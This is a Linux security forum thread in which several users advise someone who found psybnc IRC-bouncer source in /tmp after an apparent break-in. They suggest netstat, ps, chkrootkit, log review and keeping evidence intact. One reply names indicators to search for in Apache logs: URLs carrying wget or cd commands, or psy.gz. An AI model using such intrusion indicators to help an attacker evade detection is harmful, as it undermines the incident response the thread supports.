Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Introduction to Linux - A Hands on Guide
This guide was created as an overview of the Linux Operating System, geared toward new users as an exploration tour and getting started guide, with exercises at the end of each chapter.
For more advanced trainees it can be a desktop reference, and a collection of the base knowledge needed to proceed with system and network administration. This book contains many real life examples derived from the author's experience as a Linux system and network administrator, trainer and consultant. They hope these examples will help you to get a better understanding of the Linux system and that you feel encouraged to try out things on your own.
Click Here to receive this Complete Guide absolutely free.
this could mean serious trouble. bnc must be installed in other places also. (my guess)
check your netstat for any new ports that are open. check ps for suspicious processes. use chkrootkit to see if it detects anything. you would want to see your logs as to where the intruder came in from.
This could probably be some thing like a remote file inclusion in phpbb or something, so check your apache logs.
search for world writeable directories too and see if there is anything installed on them.
If you are using ssh then temp folders may be normal, I don't get them with openssh though. Either way they won't be needed after a reboot, so removing the lot and rebooting should work fine (in theory, you can dump the whole of /tmp, but I've found X was a bit picky about that). If you think you might have a security problem then you need to get busy with netstat as w3bd3vil describes.
If you have a psybnc sourcecode in tmp and you didn't put it there, then that is very bad sign. First who owned the file(s)? I would also recommend that you don't delete any more files or directories until you have a better idea of what is going on. Do follow webdevil's advice and look carefully through your apache logs, especially for URLs that have shell commands like wget, cd, etc or contain psy.gz. Don't ignore the issue and delude yourself into thinking everything is ok until you can be definitely sure of that.
Check that, the PID is the PID of the process that invoked the agent. On my machine I currently have one such directory and the file is actually
a system file of some sort, not a symbolic link (I think).
"Pysbnc" (sort of a proxy for IRC clients, or "bouncer" as they call them) is usually the first thing added by script kiddies after a system break-in. If you didn't put it there, you're definately hacked. Worse, many times pysbnc (and other tools from these types) is infected with linux virus RST (judging from the samples I've collected over the years).